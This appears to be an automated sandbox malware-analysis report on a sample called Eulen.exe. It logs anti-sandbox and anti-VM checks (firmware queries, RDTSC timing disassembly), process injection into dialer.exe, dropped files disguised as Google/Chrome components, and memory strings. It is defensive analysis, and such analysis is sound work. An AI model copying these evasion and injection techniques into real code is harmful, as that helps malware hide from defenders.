Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\choice.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\choice.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe

Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,

14_2_00007FF6473410C0

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Eulen.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	System information queried: FirmwareTableInformation
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Eulen.exe, 00000000.00000002.1640284645.000001C89A217000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLLE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Eulen.exe	RDTSC instruction interceptor: First address: 7FF6E4DD722E second address: 7FF6E4DD722E instructions: 0x00000000 rdtsc 0x00000002 dec edx 0x00000003 lea edx, dword ptr [edi+ebx] 0x00000006 dec eax 0x00000007 lea eax, dword ptr [edx+04h] 0x0000000a inc ecx 0x0000000b test ah, ah 0x0000000d dec eax 0x0000000e cmp eax, ebx 0x00000010 jmp 00007FAB24D24A55h 0x00000015 jnc 00007FAB24D24A9Ch 0x0000001b inc ecx 0x0000001c mov eax, dword ptr [ebx] 0x0000001e inc ecx 0x0000001f xor eax, eax 0x00000021 test ax, 00004335h 0x00000025 inc ecx 0x00000026 cmp eax, dword ptr [ecx+1Ch] 0x00000029 jmp 00007FAB24D24A55h 0x0000002e jne 00007FAB24D24A83h 0x00000034 dec eax 0x00000035 cmp edx, ebx 0x00000037 jmp 00007FAB24D24A55h 0x0000003c jnc 00007FAB24D24A86h 0x00000042 inc ecx 0x00000043 mov eax, dword ptr [ebx] 0x00000045 inc ecx 0x00000046 test bl, FFFFFF94h 0x00000049 inc ecx 0x0000004a xor eax, eax 0x0000004c inc ecx 0x0000004d cmp ch, 0000000Ah 0x00000050 inc ecx 0x00000051 cmp eax, dword ptr [ecx+28h] 0x00000054 jmp 00007FAB24D24A55h 0x00000059 jne 00007FAB24D24A69h 0x0000005f dec eax 0x00000060 lea eax, dword ptr [edx+03h] 0x00000063 dec eax 0x00000064 cmp eax, ebx 0x00000066 jmp 00007FAB24D24A55h 0x0000006b jnc 00007FAB24D24AB3h 0x00000071 inc ecx 0x00000072 mov eax, dword ptr [ebx] 0x00000074 inc ecx 0x00000075 xor eax, eax 0x00000077 inc ecx 0x00000078 cmp eax, dword ptr [ecx+30h] 0x0000007b jmp 00007FAB24D24A55h 0x00000080 jne 00007FAB24D24A9Eh 0x00000086 dec ecx 0x00000087 inc edx 0x00000089 jmp 00007FAB24D24A56h 0x0000008e dec esp 0x0000008f cmp edx, ebx 0x00000091 jmp 00007FAB24D24A55h 0x00000096 jc 00007FAB24D24928h 0x0000009c dec ebp 0x0000009d lea ebx, dword ptr [edx+ecx] 0x000000a0 and dx, 7F3Ch 0x000000a5 rdtsc
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	RDTSC instruction interceptor: First address: 7FF60D4A722E second address: 7FF60D4A722E instructions: 0x00000000 rdtsc 0x00000002 dec edx 0x00000003 lea edx, dword ptr [edi+ebx] 0x00000006 dec eax 0x00000007 lea eax, dword ptr [edx+04h] 0x0000000a inc ecx 0x0000000b test ah, ah 0x0000000d dec eax 0x0000000e cmp eax, ebx 0x00000010 jmp 00007FAB250F62D5h 0x00000015 jnc 00007FAB250F631Ch 0x0000001b inc ecx 0x0000001c mov eax, dword ptr [ebx] 0x0000001e inc ecx 0x0000001f xor eax, eax 0x00000021 test ax, 00004335h 0x00000025 inc ecx 0x00000026 cmp eax, dword ptr [ecx+1Ch] 0x00000029 jmp 00007FAB250F62D5h 0x0000002e jne 00007FAB250F6303h 0x00000034 dec eax 0x00000035 cmp edx, ebx 0x00000037 jmp 00007FAB250F62D5h 0x0000003c jnc 00007FAB250F6306h 0x00000042 inc ecx 0x00000043 mov eax, dword ptr [ebx] 0x00000045 inc ecx 0x00000046 test bl, FFFFFF94h 0x00000049 inc ecx 0x0000004a xor eax, eax 0x0000004c inc ecx 0x0000004d cmp ch, 0000000Ah 0x00000050 inc ecx 0x00000051 cmp eax, dword ptr [ecx+28h] 0x00000054 jmp 00007FAB250F62D5h 0x00000059 jne 00007FAB250F62E9h 0x0000005f dec eax 0x00000060 lea eax, dword ptr [edx+03h] 0x00000063 dec eax 0x00000064 cmp eax, ebx 0x00000066 jmp 00007FAB250F62D5h 0x0000006b jnc 00007FAB250F6333h 0x00000071 inc ecx 0x00000072 mov eax, dword ptr [ebx] 0x00000074 inc ecx 0x00000075 xor eax, eax 0x00000077 inc ecx 0x00000078 cmp eax, dword ptr [ecx+30h] 0x0000007b jmp 00007FAB250F62D5h 0x00000080 jne 00007FAB250F631Eh 0x00000086 dec ecx 0x00000087 inc edx 0x00000089 jmp 00007FAB250F62D6h 0x0000008e dec esp 0x0000008f cmp edx, ebx 0x00000091 jmp 00007FAB250F62D5h 0x00000096 jc 00007FAB250F61A8h 0x0000009c dec ebp 0x0000009d lea ebx, dword ptr [edx+ecx] 0x000000a0 and dx, 7F3Ch 0x000000a5 rdtsc

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Users\user\Desktop\Eulen.exe	Special instruction interceptor: First address: 7FF6E4DD7866 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Special instruction interceptor: First address: 7FF60D4A7866 instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5583	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4192	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7869	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1655	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 4634	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 5365	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 9964	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 9857

Source: C:\Users\user\Desktop\Eulen.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Dropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Dropped PE file which has not been started: C:\Windows\Temp\auqpbnqlvfdv.tmp	Jump to dropped file

Source: C:\Windows\System32\lsass.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_22-14677
Source: C:\Windows\System32\dwm.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_24-21345
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_23-14138
Source: C:\Windows\System32\winlogon.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_19-24617

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_14-449

Source: C:\Windows\System32\lsass.exe	API coverage: 7.8 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.6 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.3 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.6 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.3 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.6 %
Source: C:\Windows\System32\svchost.exe	API coverage: 2.9 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.3 %
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	API coverage: 1.3 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.6 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.3 %

Source: C:\Users\user\Desktop\Eulen.exe TID: 7592	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788	Thread sleep count: 5583 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788	Thread sleep count: 4192 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dialer.exe TID: 8084	Thread sleep count: 152 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320	Thread sleep count: 7869 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep count: 1655 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 7384	Thread sleep count: 4634 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 7384	Thread sleep time: -4634000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 7384	Thread sleep count: 5365 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 7384	Thread sleep time: -5365000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 752	Thread sleep count: 9964 > 30	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 752	Thread sleep time: -9964000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 964	Thread sleep count: 244 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 964	Thread sleep time: -244000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 1796	Thread sleep count: 9857 > 30
Source: C:\Windows\System32\dwm.exe TID: 1796	Thread sleep time: -9857000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1848	Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 1848	Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6840	Thread sleep count: 254 > 30
Source: C:\Windows\System32\svchost.exe TID: 6840	Thread sleep time: -254000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6972	Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 6972	Thread sleep time: -250000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6832	Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 6832	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6780	Thread sleep count: 206 > 30
Source: C:\Windows\System32\svchost.exe TID: 6780	Thread sleep time: -206000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6364	Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 6364	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3068	Thread sleep count: 247 > 30
Source: C:\Windows\System32\svchost.exe TID: 3068	Thread sleep time: -247000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2384	Thread sleep count: 231 > 30
Source: C:\Windows\System32\svchost.exe TID: 2384	Thread sleep time: -231000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4064	Thread sleep count: 246 > 30
Source: C:\Windows\System32\svchost.exe TID: 4064	Thread sleep time: -246000s >= -30000s
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe TID: 5080	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6592	Thread sleep count: 239 > 30
Source: C:\Windows\System32\svchost.exe TID: 6592	Thread sleep time: -239000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5124	Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 5124	Thread sleep time: -250000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4832	Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 4832	Thread sleep time: -250000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6652	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 6652	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3872	Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 3872	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5432	Thread sleep count: 247 > 30
Source: C:\Windows\System32\svchost.exe TID: 5432	Thread sleep time: -247000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6880	Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 6880	Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5712	Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 5712	Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2840	Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 2840	Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2168	Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 2168	Thread sleep time: -248000s >= -30000s

Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E99175BE3C FindFirstFileExW,	19_2_000002E99175BE3C
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCEBE3C FindFirstFileExW,	22_2_00000213BDCEBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709DBE3C FindFirstFileExW,	23_2_00000158709DBE3C
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15CBE3C FindFirstFileExW,	24_2_0000026DB15CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3F066BE3C FindFirstFileExW,	26_2_000002A3F066BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFBBBE3C FindFirstFileExW,	27_2_000002C9AFBBBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9B029BE3C FindFirstFileExW,	27_2_000002C9B029BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06FD4BE3C FindFirstFileExW,	28_2_000002C06FD4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C3BBE3C FindFirstFileExW,	29_2_000002917C3BBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C97BE3C FindFirstFileExW,	29_2_000002917C97BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000002238279BE3C FindFirstFileExW,	30_2_000002238279BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000028A1B88BE3C FindFirstFileExW,	31_2_0000028A1B88BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486AD7BE3C FindFirstFileExW,	32_2_000001486AD7BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486ADDBE3C FindFirstFileExW,	32_2_000001486ADDBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CDBE3C FindFirstFileExW,	33_2_0000024BD3CDBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3D3BE3C FindFirstFileExW,	33_2_0000024BD3D3BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D6BE3C FindFirstFileExW,	34_2_000001FA73D6BE3C
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E42FBE3C FindFirstFileExW,	39_2_00000249E42FBE3C
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E432BE3C FindFirstFileExW,	39_2_00000249E432BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD0240BE3C FindFirstFileExW,	41_2_000001CD0240BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA66BE3C FindFirstFileExW,	42_2_00000269BA66BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA6CBE3C FindFirstFileExW,	42_2_00000269BA6CBE3C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: svchost.exe, 00000021.00000003.1681695409.0000024BD5B03000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c29198182f16b7176b0e680deba6PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000021.00000002.2690358775.0000024BD362B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.1621867069.0000024BD362B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: lsass.exe, 00000016.00000000.1538314202.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c29198182f16b7176b0e680deba6
Source: svchost.exe, 00000021.00000002.2690830623.0000024BD3643000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmci
Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000001E.00000002.2686557337.000002238202B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000021.00000000.1624072878.0000024BD5200000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: svchost.exe, 00000021.00000003.1675230564.0000024BD5212000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: svchost.exe, 00000021.00000003.1681695409.0000024BD5B03000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
